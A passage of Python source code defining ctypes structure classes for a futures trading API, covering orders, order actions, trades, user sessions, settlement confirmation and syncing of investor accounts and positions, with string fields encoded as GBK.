self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderSubmitStatus:
self.OrderSubmitStatus = OrderSubmitStatus.encode("GBK")
if NotifySequence:
self.NotifySequence = NotifySequence
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if OrderSource:
self.OrderSource = OrderSource.encode("GBK")
if OrderStatus:
self.OrderStatus = OrderStatus.encode("GBK")
if OrderType:
self.OrderType = OrderType.encode("GBK")
if VolumeTraded:
self.VolumeTraded = VolumeTraded
if VolumeTotal:
self.VolumeTotal = VolumeTotal
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if ActiveTime:
self.ActiveTime = ActiveTime.encode("GBK")
if SuspendTime:
self.SuspendTime = SuspendTime.encode("GBK")
if UpdateTime:
self.UpdateTime = UpdateTime.encode("GBK")
if CancelTime:
self.CancelTime = CancelTime.encode("GBK")
if ActiveTraderID:
self.ActiveTraderID = ActiveTraderID.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if BranchID:
self.BranchID = BranchID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ExchangeOrderInsertError(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderLocalID", c_char_Array_13),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, ExchangeID=None, ParticipantID=None, TraderID=None, InstallID=None, OrderLocalID=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class InputOrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OrderActionRef", c_int),
("OrderRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("OrderSysID", c_char_Array_21),
("ActionFlag", c_char),
("LimitPrice", c_double),
("VolumeChange", c_int),
("UserID", c_char_Array_16),
("InstrumentID", c_char_Array_31),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, OrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, UserID=None, InstrumentID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OrderActionRef:
self.OrderActionRef = OrderActionRef
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeChange:
self.VolumeChange = VolumeChange
if UserID:
self.UserID = UserID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class OrderAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OrderActionRef", c_int),
("OrderRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("OrderSysID", c_char_Array_21),
("ActionFlag", c_char),
("LimitPrice", c_double),
("VolumeChange", c_int),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("StatusMsg", c_char_Array_81),
("InstrumentID", c_char_Array_31),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, OrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OrderActionRef:
self.OrderActionRef = OrderActionRef
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeChange:
self.VolumeChange = VolumeChange
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ExchangeOrderAction(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("OrderSysID", c_char_Array_21),
("ActionFlag", c_char),
("LimitPrice", c_double),
("VolumeChange", c_int),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("BranchID", c_char_Array_9),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, BranchID=None, IPAddress=None, MacAddress=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if LimitPrice:
self.LimitPrice = LimitPrice
if VolumeChange:
self.VolumeChange = VolumeChange
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ExchangeOrderActionError(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("OrderSysID", c_char_Array_21),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
]
def __init__(self, ExchangeID=None, OrderSysID=None, TraderID=None, InstallID=None, OrderLocalID=None, ActionLocalID=None, ErrorID=None, ErrorMsg=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
class ExchangeTrade(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("TradeID", c_char_Array_21),
("Direction", c_char),
("OrderSysID", c_char_Array_21),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("TradingRole", c_char),
("ExchangeInstID", c_char_Array_31),
("OffsetFlag", c_char),
("HedgeFlag", c_char),
("Price", c_double),
("Volume", c_int),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("TradeType", c_char),
("PriceSource", c_char),
("TraderID", c_char_Array_21),
("OrderLocalID", c_char_Array_13),
("ClearingPartID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("SequenceNo", c_int),
("TradeSource", c_char),
]
def __init__(self, ExchangeID=None, TradeID=None, Direction=None, OrderSysID=None, ParticipantID=None, ClientID=None, TradingRole=None, ExchangeInstID=None, OffsetFlag=None, HedgeFlag=None, Price=None, Volume=None, TradeDate=None, TradeTime=None, TradeType=None, PriceSource=None, TraderID=None, OrderLocalID=None, ClearingPartID=None, BusinessUnit=None, SequenceNo=None, TradeSource=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TradeID:
self.TradeID = TradeID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if TradingRole:
self.TradingRole = TradingRole.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if OffsetFlag:
self.OffsetFlag = OffsetFlag.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if Price:
self.Price = Price
if Volume:
self.Volume = Volume
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if TradeType:
self.TradeType = TradeType.encode("GBK")
if PriceSource:
self.PriceSource = PriceSource.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if TradeSource:
self.TradeSource = TradeSource.encode("GBK")
class Trade(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("OrderRef", c_char_Array_13),
("UserID", c_char_Array_16),
("ExchangeID", c_char_Array_9),
("TradeID", c_char_Array_21),
("Direction", c_char),
("OrderSysID", c_char_Array_21),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("TradingRole", c_char),
("ExchangeInstID", c_char_Array_31),
("OffsetFlag", c_char),
("HedgeFlag", c_char),
("Price", c_double),
("Volume", c_int),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("TradeType", c_char),
("PriceSource", c_char),
("TraderID", c_char_Array_21),
("OrderLocalID", c_char_Array_13),
("ClearingPartID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("SequenceNo", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("BrokerOrderSeq", c_int),
("TradeSource", c_char),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, ExchangeID=None, TradeID=None, Direction=None, OrderSysID=None, ParticipantID=None, ClientID=None, TradingRole=None, ExchangeInstID=None, OffsetFlag=None, HedgeFlag=None, Price=None, Volume=None, TradeDate=None, TradeTime=None, TradeType=None, PriceSource=None, TraderID=None, OrderLocalID=None, ClearingPartID=None, BusinessUnit=None, SequenceNo=None, TradingDay=None, SettlementID=None, BrokerOrderSeq=None, TradeSource=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if OrderRef:
self.OrderRef = OrderRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TradeID:
self.TradeID = TradeID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if OrderSysID:
self.OrderSysID = OrderSysID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if TradingRole:
self.TradingRole = TradingRole.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if OffsetFlag:
self.OffsetFlag = OffsetFlag.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if Price:
self.Price = Price
if Volume:
self.Volume = Volume
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if TradeType:
self.TradeType = TradeType.encode("GBK")
if PriceSource:
self.PriceSource = PriceSource.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if OrderLocalID:
self.OrderLocalID = OrderLocalID.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if BrokerOrderSeq:
self.BrokerOrderSeq = BrokerOrderSeq
if TradeSource:
self.TradeSource = TradeSource.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class UserSession(Struct):
_fields_ = [
("FrontID", c_int),
("SessionID", c_int),
("BrokerID", c_char_Array_11),
("UserID", c_char_Array_16),
("LoginDate", c_char_Array_9),
("LoginTime", c_char_Array_9),
("IPAddress", c_char_Array_16),
("UserProductInfo", c_char_Array_11),
("InterfaceProductInfo", c_char_Array_11),
("ProtocolInfo", c_char_Array_11),
("MacAddress", c_char_Array_21),
("LoginRemark", c_char_Array_36),
]
def __init__(self, FrontID=None, SessionID=None, BrokerID=None, UserID=None, LoginDate=None, LoginTime=None, IPAddress=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, LoginRemark=None):
super().__init__()
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if LoginDate:
self.LoginDate = LoginDate.encode("GBK")
if LoginTime:
self.LoginTime = LoginTime.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if InterfaceProductInfo:
self.InterfaceProductInfo = InterfaceProductInfo.encode("GBK")
if ProtocolInfo:
self.ProtocolInfo = ProtocolInfo.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if LoginRemark:
self.LoginRemark = LoginRemark.encode("GBK")
class QueryMaxOrderVolume(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("Direction", c_char),
("OffsetFlag", c_char),
("HedgeFlag", c_char),
("MaxVolume", c_int),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, Direction=None, OffsetFlag=None, HedgeFlag=None, MaxVolume=None, ExchangeID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if Direction:
self.Direction = Direction.encode("GBK")
if OffsetFlag:
self.OffsetFlag = OffsetFlag.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if MaxVolume:
self.MaxVolume = MaxVolume
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class SettlementInfoConfirm(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ConfirmDate", c_char_Array_9),
("ConfirmTime", c_char_Array_9),
("SettlementID", c_int),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, InvestorID=None, ConfirmDate=None, ConfirmTime=None, SettlementID=None, AccountID=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ConfirmDate:
self.ConfirmDate = ConfirmDate.encode("GBK")
if ConfirmTime:
self.ConfirmTime = ConfirmTime.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class SyncDeposit(Struct):
_fields_ = [
("DepositSeqNo", c_char_Array_15),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("Deposit", c_double),
("IsForce", c_int),
("CurrencyID", c_char_Array_4),
]
def __init__(self, DepositSeqNo=None, BrokerID=None, InvestorID=None, Deposit=None, IsForce=None, CurrencyID=None):
super().__init__()
if DepositSeqNo:
self.DepositSeqNo = DepositSeqNo.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if Deposit:
self.Deposit = Deposit
if IsForce:
self.IsForce = IsForce
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class SyncFundMortgage(Struct):
_fields_ = [
("MortgageSeqNo", c_char_Array_15),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("FromCurrencyID", c_char_Array_4),
("MortgageAmount", c_double),
("ToCurrencyID", c_char_Array_4),
]
def __init__(self, MortgageSeqNo=None, BrokerID=None, InvestorID=None, FromCurrencyID=None, MortgageAmount=None, ToCurrencyID=None):
super().__init__()
if MortgageSeqNo:
self.MortgageSeqNo = MortgageSeqNo.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if FromCurrencyID:
self.FromCurrencyID = FromCurrencyID.encode("GBK")
if MortgageAmount:
self.MortgageAmount = MortgageAmount
if ToCurrencyID:
self.ToCurrencyID = ToCurrencyID.encode("GBK")
class BrokerSync(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
]
def __init__(self, BrokerID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
class SyncingInvestor(Struct):
_fields_ = [
("InvestorID", c_char_Array_13),
("BrokerID", c_char_Array_11),
("InvestorGroupID", c_char_Array_13),
("InvestorName", c_char_Array_81),
("IdentifiedCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("IsActive", c_int),
("Telephone", c_char_Array_41),
("Address", c_char_Array_101),
("OpenDate", c_char_Array_9),
("Mobile", c_char_Array_41),
("CommModelID", c_char_Array_13),
("MarginModelID", c_char_Array_13),
]
def __init__(self, InvestorID=None, BrokerID=None, InvestorGroupID=None, InvestorName=None, IdentifiedCardType=None, IdentifiedCardNo=None, IsActive=None, Telephone=None, Address=None, OpenDate=None, Mobile=None, CommModelID=None, MarginModelID=None):
super().__init__()
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorGroupID:
self.InvestorGroupID = InvestorGroupID.encode("GBK")
if InvestorName:
self.InvestorName = InvestorName.encode("GBK")
if IdentifiedCardType:
self.IdentifiedCardType = IdentifiedCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if IsActive:
self.IsActive = IsActive
if Telephone:
self.Telephone = Telephone.encode("GBK")
if Address:
self.Address = Address.encode("GBK")
if OpenDate:
self.OpenDate = OpenDate.encode("GBK")
if Mobile:
self.Mobile = Mobile.encode("GBK")
if CommModelID:
self.CommModelID = CommModelID.encode("GBK")
if MarginModelID:
self.MarginModelID = MarginModelID.encode("GBK")
class SyncingTradingCode(Struct):
_fields_ = [
("InvestorID", c_char_Array_13),
("BrokerID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
("ClientID", c_char_Array_11),
("IsActive", c_int),
("ClientIDType", c_char),
]
def __init__(self, InvestorID=None, BrokerID=None, ExchangeID=None, ClientID=None, IsActive=None, ClientIDType=None):
super().__init__()
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if IsActive:
self.IsActive = IsActive
if ClientIDType:
self.ClientIDType = ClientIDType.encode("GBK")
class SyncingInvestorGroup(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorGroupID", c_char_Array_13),
("InvestorGroupName", c_char_Array_41),
]
def __init__(self, BrokerID=None, InvestorGroupID=None, InvestorGroupName=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorGroupID:
self.InvestorGroupID = InvestorGroupID.encode("GBK")
if InvestorGroupName:
self.InvestorGroupName = InvestorGroupName.encode("GBK")
class SyncingTradingAccount(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("AccountID", c_char_Array_13),
("PreMortgage", c_double),
("PreCredit", c_double),
("PreDeposit", c_double),
("PreBalance", c_double),
("PreMargin", c_double),
("InterestBase", c_double),
("Interest", c_double),
("Deposit", c_double),
("Withdraw", c_double),
("FrozenMargin", c_double),
("FrozenCash", c_double),
("FrozenCommission", c_double),
("CurrMargin", c_double),
("CashIn", c_double),
("Commission", c_double),
("CloseProfit", c_double),
("PositionProfit", c_double),
("Balance", c_double),
("Available", c_double),
("WithdrawQuota", c_double),
("Reserve", c_double),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("Credit", c_double),
("Mortgage", c_double),
("ExchangeMargin", c_double),
("DeliveryMargin", c_double),
("ExchangeDeliveryMargin", c_double),
("ReserveBalance", c_double),
("CurrencyID", c_char_Array_4),
("PreFundMortgageIn", c_double),
("PreFundMortgageOut", c_double),
("FundMortgageIn", c_double),
("FundMortgageOut", c_double),
("FundMortgageAvailable", c_double),
("MortgageableFund", c_double),
("SpecProductMargin", c_double),
("SpecProductFrozenMargin", c_double),
("SpecProductCommission", c_double),
("SpecProductFrozenCommission", c_double),
("SpecProductPositionProfit", c_double),
("SpecProductCloseProfit", c_double),
("SpecProductPositionProfitByAlg", c_double),
("SpecProductExchangeMargin", c_double),
("FrozenSwap", c_double),
("RemainSwap", c_double),
]
def __init__(self, BrokerID=None, AccountID=None, PreMortgage=None, PreCredit=None, PreDeposit=None, PreBalance=None, PreMargin=None, InterestBase=None, Interest=None, Deposit=None, Withdraw=None, FrozenMargin=None, FrozenCash=None, FrozenCommission=None, CurrMargin=None, CashIn=None, Commission=None, CloseProfit=None, PositionProfit=None, Balance=None, Available=None, WithdrawQuota=None, Reserve=None, TradingDay=None, SettlementID=None, Credit=None, Mortgage=None, ExchangeMargin=None, DeliveryMargin=None, ExchangeDeliveryMargin=None, ReserveBalance=None, CurrencyID=None, PreFundMortgageIn=None, PreFundMortgageOut=None, FundMortgageIn=None, FundMortgageOut=None, FundMortgageAvailable=None, MortgageableFund=None, SpecProductMargin=None, SpecProductFrozenMargin=None, SpecProductCommission=None, SpecProductFrozenCommission=None, SpecProductPositionProfit=None, SpecProductCloseProfit=None, SpecProductPositionProfitByAlg=None, SpecProductExchangeMargin=None, FrozenSwap=None, RemainSwap=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if PreMortgage:
self.PreMortgage = PreMortgage
if PreCredit:
self.PreCredit = PreCredit
if PreDeposit:
self.PreDeposit = PreDeposit
if PreBalance:
self.PreBalance = PreBalance
if PreMargin:
self.PreMargin = PreMargin
if InterestBase:
self.InterestBase = InterestBase
if Interest:
self.Interest = Interest
if Deposit:
self.Deposit = Deposit
if Withdraw:
self.Withdraw = Withdraw
if FrozenMargin:
self.FrozenMargin = FrozenMargin
if FrozenCash:
self.FrozenCash = FrozenCash
if FrozenCommission:
self.FrozenCommission = FrozenCommission
if CurrMargin:
self.CurrMargin = CurrMargin
if CashIn:
self.CashIn = CashIn
if Commission:
self.Commission = Commission
if CloseProfit:
self.CloseProfit = CloseProfit
if PositionProfit:
self.PositionProfit = PositionProfit
if Balance:
self.Balance = Balance
if Available:
self.Available = Available
if WithdrawQuota:
self.WithdrawQuota = WithdrawQuota
if Reserve:
self.Reserve = Reserve
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if Credit:
self.Credit = Credit
if Mortgage:
self.Mortgage = Mortgage
if ExchangeMargin:
self.ExchangeMargin = ExchangeMargin
if DeliveryMargin:
self.DeliveryMargin = DeliveryMargin
if ExchangeDeliveryMargin:
self.ExchangeDeliveryMargin = ExchangeDeliveryMargin
if ReserveBalance:
self.ReserveBalance = ReserveBalance
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if PreFundMortgageIn:
self.PreFundMortgageIn = PreFundMortgageIn
if PreFundMortgageOut:
self.PreFundMortgageOut = PreFundMortgageOut
if FundMortgageIn:
self.FundMortgageIn = FundMortgageIn
if FundMortgageOut:
self.FundMortgageOut = FundMortgageOut
if FundMortgageAvailable:
self.FundMortgageAvailable = FundMortgageAvailable
if MortgageableFund:
self.MortgageableFund = MortgageableFund
if SpecProductMargin:
self.SpecProductMargin = SpecProductMargin
if SpecProductFrozenMargin:
self.SpecProductFrozenMargin = SpecProductFrozenMargin
if SpecProductCommission:
self.SpecProductCommission = SpecProductCommission
if SpecProductFrozenCommission:
self.SpecProductFrozenCommission = SpecProductFrozenCommission
if SpecProductPositionProfit:
self.SpecProductPositionProfit = SpecProductPositionProfit
if SpecProductCloseProfit:
self.SpecProductCloseProfit = SpecProductCloseProfit
if SpecProductPositionProfitByAlg:
self.SpecProductPositionProfitByAlg = SpecProductPositionProfitByAlg
if SpecProductExchangeMargin:
self.SpecProductExchangeMargin = SpecProductExchangeMargin
if FrozenSwap:
self.FrozenSwap = FrozenSwap
if RemainSwap:
self.RemainSwap = RemainSwap
class SyncingInvestorPosition(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("PosiDirection", c_char),
("HedgeFlag", c_char),
("PositionDate", c_char),
("YdPosition", c_int),
("Position", c_int),
("LongFrozen", c_int),
("ShortFrozen", c_int),
("LongFrozenAmount", c_double),
("ShortFrozenAmount", c_double),
("OpenVolume", c_int),
("CloseVolume", c_int),
("OpenAmount", c_double),
("CloseAmount", c_double),
("PositionCost", c_double),
("PreMargin", c_double),
("UseMargin", c_double),
("FrozenMargin", c_double),
("FrozenCash", c_double),
("FrozenCommission", c_double),
("CashIn", c_double),
("Commission", c_double),
("CloseProfit", c_double),
